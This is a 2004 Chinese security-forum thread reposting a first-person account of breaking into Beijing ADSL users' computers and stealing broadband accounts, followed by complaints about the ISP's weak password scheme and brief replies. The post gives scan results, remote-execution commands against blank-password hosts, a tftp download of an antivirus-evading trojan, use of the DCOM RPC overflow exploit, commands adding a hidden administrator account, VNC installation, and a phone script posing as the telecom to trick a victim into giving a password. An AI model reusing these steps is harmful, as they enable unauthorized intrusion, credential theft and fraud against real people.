论坛: 菜鸟乐园 标题: 宽带隐患[盗号实例] 复制本贴地址    
作者: hacker521 [hacker521]    论坛用户   登录
作者:怪狗 

宽带给我带来了什么?
电信业务由电话等简单窄带业务向集语音、高速数据、
可变视频为一体的多媒体宽带业务发展不可避免。
近年来,随着家庭用户和小型商业公司宽带接入需求的迅猛增长,
许多技术已经可以满足这种需求,目前最常用、最普及的就是ADSL。


2001年,我国仅有大约50万ADSL用户;
2002年开始,中国电信各省分公司ADSL接入迅速发展,
今年上半年,全国累计建设量为128万线,
预计2002年全年ADSL建设量将超过250万线;中国电信相关人士透露,
2003年中国电信全国ADSL的接入线数将在该基础上翻一倍。

这些天,北京ADSL实行包月,免收初装费。
面对ADSL用户快速的增加,宽带用户和我们的服务商北京通信公司。
都做好准备迎接这个宽带互联的时代吗?
下面是我6天来的测试信息,从几个方面说明一些安全隐患。

游戏ID被盗;QQ密码被改;邮箱被人登录……这些情况你是否遇到过?虽然你不想,但总有那么一些“盗贼”围绕着你。
一、个人用户的安全性
1,空密码
下面是我用X-scan扫描的相关数据

第1天 9月15日 时间 8:00-10:00
扫描网段:**.***.52.1 - **.***.52.255
空密码:5个
弱密码:1个
类似于:用户名 administrator 密码:1

第2天 9月16日 时间 10:00-12:00
扫描网段:**.***.50.1 - **.***.52.255

空密码:15个
弱密码:2个

第3天 9月17日 时间 12:00-14:00
扫描网段:**.***.50.1 - **.***.52.255

空密码:3个
弱密码:无


第4天 9月18日 时间 14:00-16:00
扫描网段:**.***.50.1 - **.***.54.255

空密码:27个
弱密码:7个

第5天 9月19日 时间 16:00-21:00

扫描网段:**.***.50.1 - **.***.52.255

空密码:12个
弱密码:6个

第6天 9月20日 时间 21:00-00:00

扫描网段:**.***.50.1 - **.***.52.255

空密码:1个
弱密码:无


************************************
空密码:个数
单位个数指主机个数,
我在入侵之后用木马开放一个2048端口,
只要开放此端口者,表示已经成功入侵,
只要是入侵成功的主机不重新记算.

下面看我是如何入侵空密码的个人主机
运行77169cmd.exe
此程序的运行格式如下:
Usage: 77169cmd \\IP [Options] Command/ExeFile

Options:
/C Copy Program To The Remote Machine
/USER:UserName User For IPC Connection
/PWD:Password Password For Remote Connection
/NOWAIT Don't Wait Ror Remote Process To Terminate

Examples:
77169cmd \\RemoteIP cmd.exe
77169cmd \\RemoteIP /user:Administrator /pwd:"" cmd.exe
77169cmd \\RemoteIP /nowait trojan.exe
77169cmd \\RemoteIP /user:Administrator /pwd:Pass dir c:\
77169cmd \\RemoteIP /c /user:Guest /pwd:12345 test2.exe


我入侵空密码主机使用的命令是:
77169cmd \\**.***.51.204 /user:Administrator /pwd:"" cmd.exe
XYZCmd V1.0 For NT System - Executes Commands Remotely By WinEggDrop

Connecting To Remote Service ... OK

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>
(注)得到shell,本地运行TFTP服务器,用TFTP上传木马(此木马是wollf的变种,自己改造的用了半年了、最新版 KV、毒霸、诺顿都不能查杀,光盘中有收入)
C:\WINNT\system32>tftp �CI 61.149.5**.1 GET wollf.exe & wolf.exe
上传之后将自动运行,现在主机已经被我完全控制


二、溢出攻击
不但是空密码的主机多,而且还有很多主机没有打补丁程序

相关数据:
9月15日至今9月20 日,测试漏洞主机 12台,有两台没有成功,一台安装有防火墙,
另一台原因不明。
开始溢出:
RPC入侵过程,对方是WinXP英文版.
运行cndcom.exe
此程序使用格式如下:
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM last <hdm [at] <I>meta</I>sploit.com>
- Warning:This Code is more like a dos tool!(Modify by pingker)
- Usage: cndcom <Target ID> <Target IP>
- Targets:
- 0 Windows 2000 SP0 (English)
- 1 Windows 2000 SP1 (English)
- 2 Windows 2000 SP2 (English)
- 3 Windows 2000 SP3 (English)
- 4 Windows 2000 SP4 (English)
- 5 Windows XP SP0 (English)
- 6 Windows XP SP1 (English)
- 7 Windows NT SP5 (Chinese)
- 8 Windows NT SP6 (Chinese)
- 9 Windows NT SP6 (Chinesebig5)
- 10 Windows 2000 SP0 (Chinese)
- 11 Windows 2000 SP1 (Chinese)
- 12 Windows 2000 SP2 (Chinese)
- 13 Windows 2000 SP2 add(Chinese)
- 14 Windows 2000 SP3 (Chinese)
- 15 Windows 2000 SP3 add(Chinese&big5 sp3)
- 16 Windows 2000 SP4 (okChinese)
- 17 Windows 2000 SP4 add(Chinese)
- 18 Windows XP SP1 (Chinese)
- 19 Windows 2000 SP0 (Japanese)
- 20 Windows 2000 SP1 (Japanese)
- 21 Windows 2000 SP2 (Japanese)
- 22 Windows 2000 SP0 (Korean)
- 23 Windows 2000 SP1 (Korean)
- 24 Windows 2000 SP2 (Korean)
- 25 Windows 2000 SP0 (MX)
- 26 Windows 2000 SP1 (Mx)


我使用的命令格式是:

H:\rpc\cndcom>cndcom **.***.51.204 6
得到shell之后,建立一个账号
C:\WINNT\system32>net user 77169 77169.com /add
C:\WINNT\system32>net LOCALGROUP Administrators 77169 /add

因为我的初衷是测试ADSL用户的安全性,一些很偶然的因素,我才进行了盗号行为。
下面是我盗ADSL上网账号过程,


首先建立IPC连接
net use \\**.***.51.204\ipc$ "77169.com" /user:"77169"

安装远程控制WinVNC.exe
vnc是一个客户机系统,它基于一个简单的显示协议,具有极强的平台无关性。实际上,你完全可以把vnc当作一个远程显示系统或远程终端,通过它用户可以看到远程计算机的桌面环境,远程计算机可以是本地局域网上的一台计算机,也可以是连接入internet上的任何一台计算机,可以是一台普通的pc机,也可以是一台sun工作站,还可以是一台小型机、大型机等。远程计算机可以正在运行windows 9x操作系统,可以运行mac os,也可以运行solaris的cde桌面管理系统。其实,任何windows、x-window系统都可以。winvnc server允许任何授权用户通过vnc viewer查看并操作你的windows。由于windows nt内核目前不支持多用户,不可以多用户同时访问Windows,使用它的gui环境。所以如果有多个人使用vnc viewer同时连接到Windows,那么他们看到的将是同一个操作画面。并且其中一人的操作,都会同时在各viewer上显示。实际上大家操作的是同一桌面。

我当时只是想看看对方在干嘛!
用工具进行选择安装,


此处插入图[image001.jpg]



启动服务之后。
运行vncviewer.exe
输入密码,看见打开着 对方北京通信公司的拨号程序,
突然发现


此处插入图[image002.jpg]
 


噫~ 为什么他会有两个账号?难道?
打开一看,密码加密的。
没办法看到。

还发现,他还安装有动态域名。
OK,断线回家想办法。
.
在实际入侵中,发现北京ADSL用户大多数使用两个拨号程序
北京宽带通,和WinPoET v2.51 PPPoE Service
对在使用WinPoET v2.51 PPPoE Service拨号程序用户,
入侵步骤同上,
但我上传一个程序,在GUI界面运行之后结果

此处插入图[image004.jpg]
 


用户名密码直接就破解出来。

回家长时间思考如何破解北京宽带通,
想出两个办法
1,社会工程学
实例入侵证明宽带用户的安全意识,

因为使用动态域名访问在对方网站看到他的详细资料,
有姓名,年龄,电话 等~~~
有这些信息足够了。
找到一个公用电话,插卡那种
下面的通话记录.
对话::
怪狗:请找XXX
XXX妈:你是谁?
怪狗:你好我是电信局的.
XXX妈:好的,他在上网,马上来
怪狗:你是XXX, 年龄:21岁,宽带用户名是:xxxxxxxxxxxxx 吗?
XXX: 没错
怪狗:我们进行 “宽带e线ADSL幸运大抽奖”活动,您获得三等奖,请出示密码进行核对.
XXX:哦,密码是:xxxxxx
怪狗:好的,有什么问题您可登陆网www.bbn.com.cn 进行查询奖品情况。
挂了电话.

2,编写一个破解程序.
破解北京宽带通的程序[怪狗不打算发布]
运行之后,结果如何下.

此处插入图[image007.jpg]


此程序功能简单,会给我发送用户名密码。
此程序将不会公开。

从用户的角度来看,使用ADSL的目的当然是为了获得较大的带宽、更多的上传与下载速率; 而从通信公司来说,除了要保障用户这些方面的需求,同时还要最大程度地保护用户的应用安全。“由于现在针对端口的扫描程序越来越多,并且,针对个人的恶意攻击率也在上升,这就对使用ADSL业务以及其他形式宽带业务的用户形成挑战,除了大家都已经了解的破坏个人主机之外,还有的是盗窃个人信息。自然,这就要求我们的用户对于‘信息保密’有足够的重视,在实际应用中注意保护个人的应用信息。”

如果说用户安全隐患可通过提高用户安全意识来解决,
而服务商的安全性隐患怎么办呢?
下面我们看看ADSL服务商有那些安全隐患吧
二,ADSL服务商的服务安全性
一,密码在用户名中提取
我电话询问了三个人,发现ADSL用户密码是在用户名中提取的。
如: 100028172732
密码是:281727
这也是个隐患,
ADSL用户名是知道之后,密码十分钟就可以破解出来.
而ADSL用户名又顺序排列的。(不知道服务器用的什么算法)

二,上网查询结果
此处插入图[image008.jpg]


序号 起始时间 结束时间 服务策略名 本次时长(秒) 流入流量(byte) 流出流量(byte) 本次流量(byte)
根本没有能控制盗号的手段。
在小猫上网时代,我上网卡服务商就有一项,
拨号电话:
如:
序号 起始时间 结束时间 拨号电话
1 00:00 1:00 62223333
2 02:00 02:30 82868888
OK,62223333是我家的电话,82868888不是我家电话。那一定是盗号者的电话。这样很容易就抓住盗号者。而ADSL服务商就没有这样的项目,我还抱有希望可能ADSL服务商在硬件上有记录。只是没有显示。

图,没有记录上网地点和电话

证二,打10060证明
我打电话给客户中心10060
首先找到ADSL技术支持,回答我:“盗号问题,我们查不了,你可问业务咨询”
于是找到ADSL业务咨询,回答我:”我们查不了,请找投诉部门”
再找到投诉部门:”不会有这样的情况,这个查不了的。”
在这方面,服务商在客服中存在的诸多漏洞也是值得深思的,难道真的没有一种好的方法能够对付这些以假乱真的“李鬼”们吗?通过上面的一些入侵过程真实地暴露出中国互联网客服中存在的诸多问题,有些可能是程序上的漏洞,而有些却是完全可以避免的人为因素。我们由衷地希望商家的客服不是一种无能的力量。
如果服务商没有相应防范措施,大家也看见,我并没用很深奥的黑客技术。
这样发展下去,ADSL盗号行为将会泛滥.服务商应当对些有高度的重视,将盗号的隐患扼杀摇蓝这中。希望不要再重复小猫上网盗号泛滥的历史,前车之鉴 后世之师.
 

**************************************************************************

后言:

因为电信的漏洞一直没有补上,

我的文章在手里很长时间,这几天ADSL的服务完善了,我才发布这篇文章,

希望不教人学坏,呵呵



地主 发表时间: 04-01-16 22:10

回复: abctm [abctm]   版主   登录


B1层 发表时间: 04-02-05 22:10

回复: TGV_Mic [tgv]      登录


**************************************************************************

后言:

因为电信的漏洞一直没有补上,

我的文章在手里很长时间,这几天ADSL的服务完善了,我才发布这篇文章,

希望不教人学坏,呵呵





欣赏你的这种做法!  致以敬意~!

B2层 发表时间: 04-02-05 22:45

回复: hacker521 [hacker521]   论坛用户   登录
呵呵,这是怪狗写的,可不是我,不过他那种精神还是值得我们学习的

B3层 发表时间: 04-02-05 22:48

回复: NetPolaris [newmyth21]   论坛用户   登录


         

B4层 发表时间: 04-02-06 09:36

回复: pandahacker [pandahack]   论坛用户   登录
远程溢出的速度是不是跟双方的机器都有关啊?反正我觉远程控制肯定跟双方的网速都相关。就跟p2p软件一样。这样的话,窄带还真是在安全上具有巨大的优势啊。

B5层 发表时间: 04-02-06 09:51

回复: hacker521 [hacker521]   论坛用户   登录
那不一定,在网络中,宽带无论他速度上还是在安全服务上都具有巨大的优势,只要你时常注意到它不时带给你的小麻烦就没事了

B6层 发表时间: 04-02-06 10:09

回复: yygyjjj [yygyjjj]   论坛用户   登录


B7层 发表时间: 04-02-06 12:34

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号